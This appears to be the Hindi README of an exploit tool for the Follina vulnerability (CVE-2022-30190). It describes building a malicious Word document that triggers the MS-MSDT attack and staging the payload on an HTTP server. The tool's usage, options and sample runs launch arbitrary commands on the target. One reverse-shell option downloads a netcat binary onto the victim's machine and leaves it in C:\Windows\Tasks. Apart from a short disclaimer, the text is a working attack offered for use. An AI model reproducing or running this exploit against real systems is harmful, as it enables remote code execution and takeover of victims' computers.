
FOLLINA-CVE-2022-30190 का कार्यान्वयन
FOLLINA-CVE-2022-30190 का कार्यान्वयन
यह रिपॉजिटरी भेद्यता FOLLINA-CVE-2022-30190 के लिए एक शोषण उपकरण शामिल करता है।
यह उपकरण सुरक्षा परीक्षण और अनुसंधान उद्देश्यों के लिए विकसित किया गया है। इस उपकरण को क्लोन/फोर्क करने पर, मूल डेवलपर उपयोगकर्ताओं के कार्यों के लिए किसी भी जिम्मेदारी से इनकार करता है।
एक दुर्भावनापूर्ण Microsoft Word दस्तावेज़ के साथ "Follina" MS-MSDT हमला बनाएं और एक HTTP सर्वर के साथ पेलोड को स्टेज करें।
usage: exploit.py [-h] [--command COMMAND] [--output OUTPUT] [--interface INTERFACE] [--port PORT]
options:
-h, --help show this help message and exit
--command COMMAND
command to run on the target (default: calc)
--output OUTPUT
output maldoc file (default: ./follina.doc)
--interface INTERFACE
network interface or IP address to host the HTTP server (default: eth0)
--port PORT
port to serve the HTTP server (default: 8000)
calc.exe चलाएँ:
$ python3 exploit.py
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./cve202230190.doc
[+] serving html payload on :8000
cmd.exe चलाएँ:
$ python3 exploit.py --command "cmd"
पोर्ट 9001 पर एक रिवर्स शेल प्राप्त करें। ध्यान दें, यह पीड़ित पर एक netcat बाइनरी डाउनलोड करता है और इसे C:\Windows\Tasks में रखता है। यह बाइनरी को साफ नहीं करता। इससे एंटीवायरस का पता लगने का ट्रिगर होगा जब तक कि AV अक्षम न किया गया हो।
$ python3 exploit.py --reverse 9001